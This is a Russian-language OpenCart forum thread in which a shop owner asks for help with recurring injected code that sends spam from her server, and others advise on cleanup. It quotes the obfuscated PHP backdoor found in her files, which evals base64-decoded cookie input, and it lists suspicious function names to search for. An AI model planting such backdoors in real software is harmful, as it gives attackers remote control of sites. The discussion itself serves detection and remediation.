Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Каждый день вредоносный код(((


hitball

Recommended Posts

Здравствуйте, уважаемая поддержка!

Регулярно на сайте появляется вредоносный код, хостеру жалуются на рассылку спама с нашего сервера. Количество писем доходит до 20000, постепенно они превращаются в мертвые.

Код такого плана добавляется в файлы сайта, но многие файлы он создает сам!

<?php                                                                                                                                                                                                                                                               $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['na82bec'])) {eval($s21(${$s20}['na82bec']));}?>
<?php                                                                                                                                                                                                                                                               $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n538c51'])) {eval($s21(${$s20}['n538c51']));}?><?php
// Heading
$_['heading_title'] = 'Приветствие';
?>

Файлы и код появляются хаотично по всему сайту. К примеру сегодня удалила из папок image, vqmod, system, catalog примерно 30 кусков этого кода.

 

 

Магазин ocStore Version 1.5.4.1

Очень много стоит модулей. 

Помогите понять в чем проблема, пока нас не попросили с хостинга(((

Надіслати
Поділитися на інших сайтах


Первая и основная причина,здравствуй варез и с ним все вирусы...

Вторая менее вероятная,наличие по соседству  WP или Joomla.

Надіслати
Поділитися на інших сайтах

WP и Joomla нет. Остается варез. Как проверить. что из модулей может быть варезом? 

:-D то что стоит денег, а вы решили взять бесплатно на сомнительных сайтах и есть варез

https://ru.wikipedia.org/wiki/%D0%92%D0%B0%D1%80%D0%B5%D0%B7

Надіслати
Поділитися на інших сайтах

это понятно, но не все модули ставила я... Как определить, что из модулей варез? Я так понимаю, что проблема в этих файлах. И если удалить эти ворованные модули, то вирусы тоже не будут закачиваться?

Надіслати
Поділитися на інших сайтах


не факт. Ваши файлы системные уже скорее всего заражены.

Для начала можете сравнивать с файлами установщика в папке - system/library , так же проверьте htaccess, и пересмотрите папку vqmod/xml/

Надіслати
Поділитися на інших сайтах

не вышло у меня запустить айболит с сервера к сожалению( 

ребята, подскажите, есть ли в исходных файлах строки, которые содержат eval, base64_decode, gzinflate или str_rot13?

может по этим словам поискать?

Надіслати
Поділитися на інших сайтах


Ситуация ваша плачевная.И сколько бы вам тут не давали ссылок на разных айболитов,100% гарантии что вылечите всё нет .Пробуйте восстановить файлы из бэкапа на хостинге.Впредь знайте,что весь бесплатный сыр,как правило в мышеловках.

Надіслати
Поділитися на інших сайтах

Tom, та да. Вот ругались на этих паразитов: "Мы работали, работали, а паршивцы пришли и нагадили",  а сами по сути так же поступили. Да и в начале всегда пытаешься сэкономить. Ну обожглись - набрались опыта( И в нашей ситуации самое плачевное бэкап тоже заражен(

Надіслати
Поділитися на інших сайтах


Тогда как по мне ,выход у вас один.Собрать магазин  из чистого архива, установить в него только самые нужные модули(естественно не пытаться на авось опять залить варезную халяву).

Папку с картинками слейте и прогоните на компе  анти-вирусником.Останется только  вставить конфиги и проверенную  папку с картинками  и заменить нынешнего больного,на просветлённого нового))))

Надіслати
Поділитися на інших сайтах

Tom, да, это видимо единственный выход( что самое смешное, модули, которыми пользуемся действительно, мы купили, а заливали ерунду какую-то, которой ни разу и не воспользовались(

Надіслати
Поділитися на інших сайтах


destreser, перелопатила таки все файлы, которые яндекс выдал. и реально нашла несколько мерзких кодов. держу кулачки, чтобы помогло) спасибо вам большое! и всем спасибо за ответы!

Надіслати
Поділитися на інших сайтах


в основном красным и с пометкой file detected="c" были впрочем и в желтых с пометкой file detected="w"

 сегодня пока ничего не лезет, очень надеюсь, что помогло!

Надіслати
Поділитися на інших сайтах


в основном красным и с пометкой file detected="c" были впрочем и в желтых с пометкой file detected="w"

 сегодня пока ничего не лезет, очень надеюсь, что помогло!

Привет! попробывала Манул. Сканировать не стал - выдал ошибку. А у тебя все получилось с первого раза? Делала все как в инструкции?

Надіслати
Поділитися на інших сайтах


Привет! попробывала Манул. Сканировать не стал - выдал ошибку. А у тебя все получилось с первого раза? Делала все как в инструкции?

 

Еще одна инструкция https://opencartforum.com/topic/47034-вирус-плодит-htaccess/?do=findComment&comment=405514

Надіслати
Поділитися на інших сайтах

Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.